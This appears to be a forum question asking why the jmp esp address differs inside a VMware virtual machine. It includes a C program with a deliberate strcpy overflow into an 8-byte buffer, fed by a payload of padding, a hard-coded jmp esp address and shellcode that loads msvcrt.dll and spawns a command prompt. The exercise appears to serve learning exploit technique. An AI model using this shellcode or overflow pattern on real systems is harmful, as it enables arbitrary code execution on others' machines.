VMware虚拟机中jmp esp地址不一样
看以下代码:
#include <stdio.h>#include <string.h>char name[] = "\x41\x41\x41\x41" "\x41\x41\x41\x41" "\x41\x41\x41\x41" "\x12\x45\xfa\x7f" //7ffa4512 也即是jmp esp地址 "\x55\x8B\xEC\x33\xC0\x50\x50\x50"//以下是启动命令提示符的shellcode"\xC6\x45\xF4\x4D""\xC6\x45\xF5\x53" "\xC6\x45\xF6\x56" "\xC6\x45\xF7\x43""\xC6\x45\xF8\x52""\xC6\x45\xF9\x54""\xC6\x45\xFA\x2E""\xC6\x45\xFB\x44""\xC6\x45\xFC\x4C""\xC6\x45\xFD\x4C""\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2""\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D""\x89\x45\xF4\xB8\x61\x6E\x64\x2E" "\x89\x45\xF8\xB8\x63\x6F\x6D\x22""\x89\x45\xFC\x33\xD2\x88\x55\xFF""\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";int main(){ char output[8]; strcpy(output, name); for(int i=0;i<8&&output[i];i++) printf("\\0x%x",output[i]); return 0;}